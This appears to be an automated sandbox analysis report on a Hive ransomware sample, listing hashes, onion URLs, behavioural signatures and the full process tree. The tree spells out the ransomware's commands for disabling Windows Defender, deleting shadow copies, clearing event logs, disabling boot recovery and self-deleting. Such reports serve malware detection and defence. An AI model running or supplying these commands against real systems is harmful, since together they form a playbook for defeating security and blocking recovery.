Analysis
max time kernel: 112s
max time network: 30s
platform: windows7_x64
resource: win7-en-20211208
submitted: 12-01-2022 19:19

Static task: static1

Behavioral task: behavioral1
Sample: edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe
Resource: win7-en-20211208

Behavioral task: behavioral2
Sample: edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe
Resource: win10-en-20211208
General
Target: edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe
Size: 2.7MB
MD5: fd7791be5fa43af1e9add98f15cf9c58
SHA1: 78a7c5facdbbb0584033dd57b25c4df854c48eb7
SHA256: edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826
SHA512: 1020f1c311403020e7a604d69509c9ccd3d4c5fca4a643045241db52455eb8380d883c7f8e6e4b75ab32a252ed9fd5c90e0ab254f1836e4fdddb1622291b371a
Malware Config
Extracted
Path: C:\Program Files\7-Zip\a84r_HOW_TO_DECRYPT.txt
Family: hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses mpcmdrun utility to delete all AV definitions.
Processes: MpCmdRun.exe (PID 2136)

Hive
A ransomware written in Golang first seen in June 2021.

Modifies security service (2 TTPs, 1 IoC)
Processes: reg.exe: Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"

Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes: bcdedit.exe (PID 2072), bcdedit.exe (PID 2096)

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Drops file in Program Files directory (64 IoCs)
Processes: edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes: vssadmin.exe (PID 1532)

Opens file in notepad (likely ransom note) (1 IoC)
Processes: notepad.exe (PID 2620)

Runs net.exe

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes: powershell.exe (PID 2168), powershell.exe (PID 2252), edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe (PID 1580)

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes: wevtutil.exe (PID 1696), wevtutil.exe (PID 1216), wmic.exe (PID 748), wmic.exe (PID 968)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes: edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe (PID 1580), net.exe (PIDs 960, 892, 1628, 1900, 1516, 1736, 1432, 1140)
Processes
(indentation level = process depth; each entry shows the command line, the PID, the image path, and any signatures triggered by that process)

[1] "C:\Users\Admin\AppData\Local\Temp\edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe"  (PID 1580, image C:\Users\Admin\AppData\Local\Temp\edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe)
    signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
  [2] net.exe stop "NetMsmqActivator" /y  (PID 960, image C:\Windows\system32\net.exe)
      signatures: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1 stop "NetMsmqActivator" /y  (PID 268, image C:\Windows\system32\net1.exe)
  [2] net.exe stop "SamSs" /y  (PID 892, image C:\Windows\system32\net.exe)
      signatures: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1 stop "SamSs" /y  (PID 592, image C:\Windows\system32\net1.exe)
  [2] net.exe stop "SDRSVC" /y  (PID 1628, image C:\Windows\system32\net.exe)
      signatures: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1 stop "SDRSVC" /y  (PID 980, image C:\Windows\system32\net1.exe)
  [2] net.exe stop "SstpSvc" /y  (PID 1900, image C:\Windows\system32\net.exe)
      signatures: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1 stop "SstpSvc" /y  (PID 836, image C:\Windows\system32\net1.exe)
  [2] net.exe stop "UI0Detect" /y  (PID 1516, image C:\Windows\system32\net.exe)
      signatures: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1 stop "UI0Detect" /y  (PID 396, image C:\Windows\system32\net1.exe)
  [2] net.exe stop "VSS" /y  (PID 1736, image C:\Windows\system32\net.exe)
      signatures: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1 stop "VSS" /y  (PID 968, image C:\Windows\system32\net1.exe)
  [2] net.exe stop "wbengine" /y  (PID 1432, image C:\Windows\system32\net.exe)
      signatures: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1 stop "wbengine" /y  (PID 1440, image C:\Windows\system32\net1.exe)
  [2] net.exe stop "WebClient" /y  (PID 1140, image C:\Windows\system32\net.exe)
      signatures: Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1 stop "WebClient" /y  (PID 1264, image C:\Windows\system32\net1.exe)
  [2] sc.exe config "NetMsmqActivator" start= disabled  (PID 1100, image C:\Windows\system32\sc.exe)
  [2] sc.exe config "SamSs" start= disabled  (PID 1340, image C:\Windows\system32\sc.exe)
  [2] sc.exe config "SDRSVC" start= disabled  (PID 1812, image C:\Windows\system32\sc.exe)
  [2] sc.exe config "SstpSvc" start= disabled  (PID 1984, image C:\Windows\system32\sc.exe)
  [2] sc.exe config "UI0Detect" start= disabled  (PID 1856, image C:\Windows\system32\sc.exe)
  [2] sc.exe config "VSS" start= disabled  (PID 1960, image C:\Windows\system32\sc.exe)
  [2] sc.exe config "wbengine" start= disabled  (PID 548, image C:\Windows\system32\sc.exe)
  [2] sc.exe config "WebClient" start= disabled  (PID 1740, image C:\Windows\system32\sc.exe)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f  (PID 1160, image C:\Windows\system32\reg.exe)
  [2] reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f  (PID 1612, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f  (PID 1552, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f  (PID 1324, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f  (PID 976, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f  (PID 240, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f  (PID 1212, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f  (PID 1440, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f  (PID 1524, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f  (PID 1328, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f  (PID 1040, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f  (PID 1724, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f  (PID 1916, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f  (PID 280, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f  (PID 360, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f  (PID 1508, image C:\Windows\system32\reg.exe)
  [2] schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable  (PID 1572, image C:\Windows\system32\schtasks.exe)
  [2] schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable  (PID 320, image C:\Windows\system32\schtasks.exe)
  [2] schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable  (PID 396, image C:\Windows\system32\schtasks.exe)
  [2] schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable  (PID 1144, image C:\Windows\system32\schtasks.exe)
  [2] schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable  (PID 1032, image C:\Windows\system32\schtasks.exe)
  [2] reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f  (PID 1308, image C:\Windows\system32\reg.exe)
  [2] reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f  (PID 1728, image C:\Windows\system32\reg.exe)
  [2] reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f  (PID 1920, image C:\Windows\system32\reg.exe)
  [2] reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f  (PID 1356, image C:\Windows\system32\reg.exe)
  [2] reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f  (PID 1988, image C:\Windows\system32\reg.exe)
  [2] reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f  (PID 1600, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f  (PID 436, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f  (PID 1152, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f  (PID 984, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f  (PID 1712, image C:\Windows\system32\reg.exe)
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f  (PID 1816, image C:\Windows\system32\reg.exe)
      signatures: Modifies security service
  [2] reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f  (PID 2016, image C:\Windows\system32\reg.exe)
  [2] vssadmin.exe delete shadows /all /quiet  (PID 1532, image C:\Windows\system32\vssadmin.exe)
      signatures: Interacts with shadow copies
  [2] wevtutil.exe cl system  (PID 1696, image C:\Windows\system32\wevtutil.exe)
      signatures: Suspicious use of AdjustPrivilegeToken
  [2] wevtutil.exe cl security  (PID 1396, image C:\Windows\system32\wevtutil.exe)
  [2] wevtutil.exe cl application  (PID 1216, image C:\Windows\system32\wevtutil.exe)
      signatures: Suspicious use of AdjustPrivilegeToken
  [2] wmic.exe SHADOWCOPY /nointeractive  (PID 748, image C:\Windows\System32\Wbem\wmic.exe)
      signatures: Suspicious use of AdjustPrivilegeToken
  [2] wmic.exe shadowcopy delete  (PID 968, image C:\Windows\System32\Wbem\wmic.exe)
      signatures: Suspicious use of AdjustPrivilegeToken
  [2] bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures  (PID 2072, image C:\Windows\system32\bcdedit.exe)
      signatures: Modifies boot configuration data using bcdedit
  [2] bcdedit.exe /set {default} recoveryenabled no  (PID 2096, image C:\Windows\system32\bcdedit.exe)
      signatures: Modifies boot configuration data using bcdedit
  [2] cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All  (PID 2116, image C:\Windows\system32\cmd.exe)
    [3] "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All  (PID 2136, image C:\Program Files\Windows Defender\MpCmdRun.exe)
        signatures: Deletes Windows Defender Definitions
  [2] cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true  (PID 2148, image C:\Windows\system32\cmd.exe)
    [3] powershell Set-MpPreference -DisableIOAVProtection $true  (PID 2168, image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
        signatures: Suspicious behavior: EnumeratesProcesses
  [2] cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true  (PID 2232, image C:\Windows\system32\cmd.exe)
    [3] powershell Set-MpPreference -DisableRealtimeMonitoring $true  (PID 2252, image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe)
        signatures: Suspicious behavior: EnumeratesProcesses
  [2] notepad.exe C:\a84r_HOW_TO_DECRYPT.txt  (PID 2620, image C:\Windows\system32\notepad.exe)
      signatures: Opens file in notepad (likely ransom note)
  [2] cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\edf745e4d22485a77b93437843023b27d072fcffb14ea91ca8f309b14d5c5826.exe"  (PID 2628, image C:\Windows\system32\cmd.exe)
    [3] ping.exe -n 5 127.0.0.1  (PID 2652, image C:\Windows\system32\PING.EXE)
        signatures: Runs ping.exe
Network
MITRE ATT&CK Enterprise v6
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms